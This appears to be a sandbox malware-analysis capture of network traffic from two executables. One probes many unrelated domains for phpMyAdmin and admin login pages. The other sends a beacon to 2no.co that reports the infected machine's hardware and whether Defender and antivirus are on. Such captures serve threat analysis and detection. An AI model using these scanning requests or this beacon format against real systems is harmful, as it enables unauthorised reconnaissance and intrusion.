Nov 30, 2023 11:23:31.934107065 CET	435	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:31 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/pma/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
325	192.168.2.4	53945	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.181538105 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.361749887 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:32 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
326	192.168.2.4	53936	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.189177036 CET	223	OUT	GET /phpmyadmin/ HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.379729986 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:32 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
327	192.168.2.4	55097	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.312031031 CET	221	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.491805077 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:32 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/PhpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
328	192.168.2.4	55565	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.397974968 CET	220	OUT	GET /admin.php HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.588551044 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:32 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
329	192.168.2.4	56362	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.549485922 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.729280949 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:32 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
330	192.168.2.4	56438	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.625916958 CET	223	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.822998047 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:32 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
331	192.168.2.4	56969	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:32.800383091 CET	216	OUT	GET /admin HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:32.991117001 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:32 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
332	192.168.2.4	57647	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:33.018099070 CET	223	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:33.208350897 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:33 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
333	192.168.2.4	57769	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:33.182341099 CET	216	OUT	GET /admin HTTP/1.1 Host: a5a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:33.373156071 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:33 GMT content-length: 0 server: NginX

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	104.21.79.229	443	5316	C:\Users\user\AppData\Local\Temp\38B4.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:19:48 UTC	297	OUT	GET /1oH5R HTTP/1.1 Connection: Keep-Alive Content-Type: text/plain; Charset=UTF-8 Accept: / User-Agent: WIN_10 X64 19045 \| Memory: 8.00 Gb \| Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\| Cores: 4 \| Videocard: RG6LH57X \| SmartScreen: YES \| Defender: NO \| Antivirus: NO Host: 2no.co
2023-11-30 10:19:49 UTC	1135	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 31 39 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 32 31 31 33 35 33 35 39 32 35 30 30 39 39 31 30 38 36 3d 33 3b 20 65 78 70 69 72 65 73 3d 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 31 30 3a 31 39 3a 34 39 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 31 36 32 32 34 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 53 74 72 Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:19:49 GMTContent-Type: image/pngTransfer-Encoding: chunkedConnection: closeset-cookie: 211353592500991086=3; expires=Sat, 30 Nov 2024 10:19:49 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Str
2023-11-30 10:19:49 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2023-11-30 10:19:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	51739	3.33.224.147	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:37 UTC	370	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 2d 4c 69 6d 69 74 3a 20 31 32 30 30 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 Data Ascii: HTTP/1.1 302 FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateDate: Thu, 30 Nov 2023 10:22:37 GMTLocation: https://hna.beX-RateLimit-Limit: 1200X-RateLimit
2023-11-30 10:22:37 UTC	314	IN	Data Raw: 31 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 Data Ascii: 12e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://hna.be'" /> <title>Redirecting to https://hna.be</title> </head> <body> Redirecting to <a href="htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	52826	15.197.204.56	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:37 UTC	717	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:37 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:37 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	52844	13.248.169.48	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	169	OUT	GET /phpmyadmin/ HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:37 UTC	718	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:37 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:37 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	52950	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:37 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:37 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
2023-11-30 10:22:37 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	52839	199.59.243.225	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	166	OUT	GET /phpmyadmin/ HTTP/1.1 Host: ia.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	689	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 39 0d 0a 58 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 35 36 37 65 37 32 32 34 2d 33 33 62 63 2d 34 62 65 64 2d 39 33 39 37 2d 65 30 31 38 66 61 32 31 37 37 38 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 73 65 63 2d 63 68 2d 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 0d 0a 43 72 69 74 69 63 61 6c 2d 43 68 Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 1009X-Request-Id: 567e7224-33bc-4bed-9397-e018fa21778dCache-Control: no-store, max-age=0Accept-Ch: sec-ch-prefers-color-schemeCritical-Ch
